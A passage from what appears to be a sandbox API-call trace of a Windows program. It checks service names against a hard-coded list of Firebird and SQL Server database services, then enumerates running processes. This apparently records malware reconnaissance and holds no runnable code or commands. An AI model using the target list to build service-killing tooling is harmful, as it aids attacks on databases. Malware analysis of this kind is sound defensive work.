lpString2="EventLog") returned 1 [0316.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0316.734] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0316.734] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0316.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0316.734] lstrlenW (lpString="EventSystem") returned 11 [0316.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0316.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0316.735] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0316.735] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0316.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0316.735] lstrlenW (lpString="FontCache") returned 9 [0316.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0316.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0316.735] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0316.735] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0316.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0316.735] lstrlenW (lpString="gpsvc") returned 5 [0316.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0316.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0316.735] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0316.735] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0316.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0316.735] lstrlenW (lpString="iphlpsvc") returned 8 [0316.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0316.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0316.735] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0316.735] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0316.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0316.735] lstrlenW (lpString="KeyIso") returned 6 [0316.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0316.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0316.736] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0316.736] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0316.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0316.736] lstrlenW (lpString="LanmanServer") returned 12 [0316.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0316.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0316.736] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0316.736] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0316.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0316.736] lstrlenW (lpString="LanmanWorkstation") returned 17 [0316.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0316.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0316.736] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0316.736] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0316.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0316.736] lstrlenW (lpString="lfsvc") returned 5 [0316.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0316.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0316.736] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0316.736] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0316.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0316.736] lstrlenW (lpString="lmhosts") returned 7 [0316.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0316.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0316.736] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0316.737] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0316.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0316.737] lstrlenW (lpString="LSM") returned 3 [0316.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0316.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0316.737] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0316.737] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0316.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0316.737] lstrlenW (lpString="MpsSvc") returned 6 [0316.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0316.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0316.737] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0316.737] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0316.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0316.737] lstrlenW (lpString="NcbService") returned 10 [0316.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0316.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0316.737] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0316.737] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0316.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0316.737] lstrlenW (lpString="netprofm") returned 8 [0316.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0316.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0316.737] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0316.737] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0316.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0316.738] lstrlenW (lpString="NgcSvc") returned 6 [0316.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0316.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0316.738] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0316.738] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0316.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0316.738] lstrlenW (lpString="NlaSvc") returned 6 [0316.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0316.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0316.738] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0316.738] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0316.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0316.738] lstrlenW (lpString="nsi") returned 3 [0316.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0316.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0316.738] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0316.738] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0316.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0316.738] lstrlenW (lpString="PcaSvc") returned 6 [0316.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0316.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0316.738] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0316.738] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0316.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0316.739] lstrlenW (lpString="PlugPlay") returned 8 [0316.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0316.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0316.739] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0316.739] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0316.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0316.739] lstrlenW (lpString="Power") returned 5 [0316.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0316.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0316.739] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0316.739] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0316.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0316.739] lstrlenW (lpString="ProfSvc") returned 7 [0316.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0316.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0316.739] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0316.739] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0316.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0316.739] lstrlenW (lpString="RpcEptMapper") returned 12 [0316.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0316.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0316.739] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0316.739] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0316.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0316.740] lstrlenW (lpString="RpcSs") returned 5 [0316.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0316.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0316.740] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0316.740] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0316.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0316.740] lstrlenW (lpString="SamSs") returned 5 [0316.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0316.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0316.740] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0316.740] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0316.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0316.740] lstrlenW (lpString="Schedule") returned 8 [0316.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0316.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0316.740] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0316.740] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0316.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0316.740] lstrlenW (lpString="SecurityHealthService") returned 21 [0316.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0316.741] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0316.741] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0316.741] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0316.741] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0316.741] lstrlenW (lpString="SENS") returned 4 [0316.741] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0316.741] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0316.741] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0316.741] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0316.741] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0316.741] lstrlenW (lpString="ShellHWDetection") returned 16 [0316.741] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0316.741] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0316.741] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0316.741] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0316.741] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0316.741] lstrlenW (lpString="Spooler") returned 7 [0316.741] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0316.741] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0316.741] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0316.741] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0316.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0316.742] lstrlenW (lpString="StateRepository") returned 15 [0316.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0316.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0316.742] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0316.742] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0316.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0316.742] lstrlenW (lpString="SysMain") returned 7 [0316.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0316.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0316.742] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0316.742] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0316.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0316.742] lstrlenW (lpString="SystemEventsBroker") returned 18 [0316.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0316.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0316.742] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0316.742] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0316.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0316.742] lstrlenW (lpString="Themes") returned 6 [0316.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0316.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0316.742] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0316.742] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0316.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0316.743] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0316.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0316.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0316.743] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0316.743] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0316.743] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41539d8 | out: hHeap=0x470000) returned 1 [0316.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x53c [0316.921] Process32FirstW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0316.921] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0316.922] lstrlenW (lpString="System") returned 6 [0316.922] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0316.923] lstrlenW (lpString="smss.exe") returned 8 [0316.923] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0316.923] lstrlenW (lpString="csrss.exe") returned 9 [0316.923] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0316.924] lstrlenW (lpString="wininit.exe") returned 11 [0316.924] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0316.924] lstrlenW (lpString="csrss.exe") returned 9 [0316.925] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0316.925] lstrlenW (lpString="winlogon.exe") returned 12 [0316.925] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0316.926] lstrlenW (lpString="services.exe") returned 12 [0316.926] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0316.927] lstrlenW (lpString="lsass.exe") returned 9 [0316.927] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0316.927] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0316.927] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0316.928] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0316.928] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.929] lstrlenW (lpString="svchost.exe") returned 11 [0316.929] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.929] lstrlenW (lpString="svchost.exe") returned 11 [0316.929] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0316.930] lstrlenW (lpString="dwm.exe") returned 7 [0316.930] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.931] lstrlenW (lpString="svchost.exe") returned 11 [0316.931] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.931] lstrlenW (lpString="svchost.exe") returned 11 [0316.931] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.932] lstrlenW (lpString="svchost.exe") returned 11 [0316.932] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.933] lstrlenW (lpString="svchost.exe") returned 11 [0316.933] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.933] lstrlenW (lpString="svchost.exe") returned 11 [0316.933] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.934] lstrlenW (lpString="svchost.exe") returned 11 [0316.934] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.935] lstrlenW (lpString="svchost.exe") returned 11 [0316.935] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.935] lstrlenW (lpString="svchost.exe") returned 11 [0316.935] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.936] lstrlenW (lpString="svchost.exe") returned 11 [0316.936] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.936] lstrlenW (lpString="svchost.exe") returned 11 [0316.936] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0316.937] lstrlenW (lpString="spoolsv.exe") returned 11 [0316.937] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.938] lstrlenW (lpString="svchost.exe") returned 11 [0316.938] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0316.939] lstrlenW (lpString="audiodg.exe") returned 11 [0316.939] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0316.939] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0316.939] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, 